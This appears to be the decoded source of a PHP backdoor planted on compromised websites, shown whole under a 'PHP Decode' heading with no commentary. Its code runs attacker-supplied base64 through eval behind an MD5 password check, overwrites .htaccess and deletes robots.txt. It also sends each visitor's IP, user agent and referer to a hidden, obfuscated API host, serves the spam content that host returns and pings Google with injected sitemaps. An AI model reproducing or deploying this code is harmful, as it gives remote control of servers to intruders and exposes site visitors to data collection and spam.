PHP Decode

 function f_rsync_http_request($url, $async = 0, $method = 1, $pf = NULL, $headers = array(), $domain = "s") { if (!preg_match("/^https*\:\/\//si", $url)) { if (isset($_GET['urlerr'])) { $err = '[urlerror] invalid url: '; $err .= $url; echo $err; unset($err); exit(); } return ''; } $a = 'curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create'; $b = $out = ''; foreach (explode('|', $a) as $c) { $y = 1; if ($async && substr($c, 0, 1) == 'c') { continue; } foreach (explode('+', $c) as $d) { if (!function_exists($d)) { $y = 0; } } unset($d); if ($y) { $b = $c; break; } } unset($a, $c); if ($b == '') { return 0; } if (substr($b, 0, 1) == 'c') { $r = false; if ($method == 2) { if(is_array($pf)){ $opts = array('http' => array( 'method' => "POST", 'header' => "Content-Type: application/x-www-form-urlencoded", 'content' => http_build_query($pf) ) ); $context = stream_context_create($opts); $r = file_get_contents($url, false, $context); } } else { $r = file_get_contents($url); } if($r) { return $r; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $domain); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($method == 2) { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if (!$r) { if (isset($_GET['curlerr'])) { $err = '[curl error] '; $err .= curl_error($ch); echo $err; unset($err); exit(); } return 0; }else{ return $r; } } $parse = parse_url($url); isset($parse['host']) || $parse['host'] = ''; isset($parse['path']) || $parse['path'] = ''; isset($parse['query'])|| $parse['query'] = ''; isset($parse['port']) || $parse['port'] = ''; $xpath = $parse['path'] ? $parse['path'].($parse['query'] ? '?'.$parse['query'] : '') : '/'; $_host = $parse['host']; if ($parse['scheme'] == 'https') { $version = '1.1'; $port = empty($parse['port']) ? 443 : $parse['port']; $_host = 'ssl://'; $_host .= $parse['host']; } else { $version = '1.0'; $port = empty($parse['port']) ? 80 : $parse['port']; } $hhost = 'Host: '; $hhost .= $_host; $headers[] = $hhost; $headers[] = 'Connection: Close'; $headers[] = 'User-Agent: ' . $domain; $headers[] = 'Accept: */*'; unset($hhost); if ($method == 2) { if(is_array($pf)){ $pf = http_build_query($pf); } $headers[] = 'Content-type: application/x-www-form-urlencoded'; $headers[] = 'Content-Length: '.strlen($pf); $out = "POST $xpath HTTP/$version" . PHP_EOL.join(PHP_EOL, $headers).PHP_EOL.PHP_EOL.$pf; unset($pf); } else { $out = "GET $xpath HTTP/$version" . PHP_EOL.join(PHP_EOL, $headers).PHP_EOL.PHP_EOL; } unset($headers, $parse, $version, $xpath); $fp = null; if (substr($b, -1) == 'n') { $fp = $b($_host, $port, $errno, $errstr, 30); }else{ if (substr($b, -1) == 't') { $tcp = 'tcp://'; $tcp .= $_host; $tcp .= ':'; $tcp .= $port; $fp = stream_socket_client($tcp, $errno, $errstr, 30); unset($tcp); } } $content = ''; if ($fp) { stream_set_blocking($fp, TRUE); stream_set_timeout($fp, 30); fwrite($fp, $out); if (!$async) { $status = stream_get_meta_data($fp); if (!$status['timed_out']) { while (!feof($fp)) { $line = fgets($fp); if ($line && (rawurlencode($line) == "%0D%0A" || rawurlencode($line) == "%0A")) { break; } unset($line); } while (!feof($fp)) { $data = fread($fp, 8192); $content .= $data; unset($data); } } unset($status); } fclose($fp); } else { if (substr($b, -1) == 'e') { $_ip = gethostbyname($_host); $fp = $b(AF_INET, SOCK_STREAM, 0); if (socket_connect($fp, $_ip, $port)) { if (!$async) { socket_write($fp, $out, strlen($out)); while($bf=@socket_read($fp, 8192)){ $content .= $bf; unset($bf); } $content = explode("

", $content); array_shift($content); $content = implode("

", $content); }else{ $t = mt_rand(2, 5); $i = 0; while ($i < $t) { socket_write($fp, $out, strlen($out)); $i++; usleep(mt_rand(50000, 100000)); } unset($i, $t); } } socket_close($fp); unset($_ip); } } unset($out, $b, $fp, $port, $_host); if (!$async) { $content = @preg_replace_callback( '/(?:(?:
|
)|^)([0-9A-F]+)(?:
|
){1,2}(.*?)'. '((?:
|
)(?:[0-9A-F]+(?:
|
))|$)/si', 'f_async', $content ); return trim(trim($content, "")); }else{ return 1; } } function f_async($matches) { return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0]; } function base_encode($string){ $base = base64_encode(gzdeflate($string)); $base_pre = substr($base, 0, 5); $base_ext = substr($base, -5); $base_ = substr($base, 5, strlen($base) - 10); return $base_pre . 'hT' . substr($base, 5, strlen($base) - 10) . 'tP' . $base_ext; } function BASE64_DEC0DE($string){ $base_pre = substr($string, 0, 5); $base_ext = substr($string, -5); $base_ = substr($string, 7, strlen($string) - 14); return gzinflate(base64_decode($base_pre . $base_ . $base_ext)); } function f_get_client_ip($ip_address = ''){ if(isset($_SERVER)) { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR']; } else if(isset($_SERVER['HTTP_CLIENT_IP'])) { $ip_address = $_SERVER['HTTP_CLIENT_IP']; } else { $ip_address = $_SERVER['REMOTE_ADDR']; } } else { if(getenv('HTTP_X_FORWARDED_FOR')){ $ip_address = getenv('HTTP_X_FORWARDED_FOR'); }else if(getenv('HTTP_CLIENT_IP')){ $ip_address = getenv('HTTP_CLIENT_IP'); }else{ $ip_address = getenv('REMOTE_ADDR'); } } return $ip_address; } function f_get_server_domain($string = '') { if (isset($_SERVER['HTTP_HOST'])) { return $_SERVER['HTTP_HOST']; } elseif (isset($_SERVER['SERVER_NAME'])) { return $_SERVER['SERVER_NAME']; } return $string; } function f_get_api_domain($dp) { $dp_array = str_split($dp); $real_string = ''; for ($i=0;$i<count($dp_array);$i++) { if ($i%2 != 0) { $real_string .= $dp_array[$i]; } } return base64_decode($real_string); } function f_decode_content($content) { $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY); if (!is_array($data_array)) { return false; } if (count($data_array) < 2) { return false; } $content_array['data'] = array_pop($data_array); $content_array['data'] = base64_decode($content_array['data']); $content_array['headers'] = $data_array; return $content_array; } function f_check_htaccess($htaccess = '') { $robots = 'robots.txt'; if (file_exists($robots)){ @unlink($robots); } if ($htaccess == '') { $htaccess = '.htaccess'; } $content = 'PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+'; $content = base64_decode($content); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } function f_site_map($googleUrl, $siteMap, $params) { $ping_url_format = 'https://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, $googleUrl, $params['protocol'], $params['server_domain'], $siteMap); $ping_result = f_rsync_http_request($ping_url); if(isset($_REQUEST['st'])){ var_dump($ping_url); var_dump($ping_result); die(); } $check_url = 'google'; $die_success_result = 'success'; $die_failed_result = 'failed'; if (strpos($ping_result, $check_url) != false) { die($die_success_result); } else { $ping_url_format = 'http://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, $googleUrl, $params['protocol'], $params['server_domain'], $siteMap); $ping_result = f_rsync_http_request($ping_url); if (strpos($ping_result, $check_url) != false) { die($die_success_result); } die($die_failed_result); } } function f_main($dp) { $params = array(); $params['default_params'] = $dp; $params['api'] = f_get_api_domain($params['default_params']); $params['server_domain'] = f_get_server_domain(); $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['user_agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = f_get_client_ip(); if (isset($_SERVER['HTTPS'])) { $params['protocol'] = 'https://'; } else { $params['protocol'] = 'http://'; } if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $params['language'] = $_SERVER['HTTP_ACCEPT_LANGUAGE']; } else { $params['language'] = ""; } if (isset($_REQUEST['params'])) { $header = 'Content-type: application/json'; header($header); if (function_exists('json_encode')) { echo json_encode($params); } else { print_r($params); } die(); } if (isset($_REQUEST['d_time'])){ die('2021/6/2'); } if (isset($_REQUEST['pwd163'])) { if(md5(trim($_REQUEST['pwd163'])) == "174cb895c887411510d63e22e098e02c") { $a = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST['zzz']))))); $need = base64_decode("PD9waHA="); if (strpos($a, $need) === false) { $a = $need . PHP_EOL . $a; } if (isset($_REQUEST['e'])) { $a = str_replace($need, "", $a); $b = 'e'.base64_decode("dmE=").'l'; $b($a);die(); } $file_name = tmpfile(); fwrite($file_name, $a); $temp_array = stream_get_meta_data($file_name); @require($temp_array['uri']); fclose($file_name);die(); } if (md5($_REQUEST['pwd163'] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8"){ if (isset($_GET['sitemap'])) { $siteMap = $_GET['sitemap']; $google_url = 'www.google.com'; if (isset($_GET['google_url'])) { $google_url = $_GET['google_url']; } f_site_map($google_url, $siteMap, $params); } } } f_check_htaccess(); $post_data = array( 'domain' => $params['server_domain'], 'request_url' => $params['request_url'], 'ip' => $params['ip'], 'agent' => $params['user_agent'], 'referer' => $params['referer'], 'protocol' => $params['protocol'], 'language' => $params['language'] ); $content = f_rsync_http_request($params['api'], 0, 2, $post_data, array(), $params['server_domain']); if (isset($_REQUEST['dump'])) { var_dump($content); $content = f_rsync_http_request("http://google.co.jp"); var_dump($content); die(); } $data = f_decode_content($content); if ($data !== false) { foreach ($data['headers'] as $header) { @header($header); } echo $data['data']; die(); } } f_main($dp);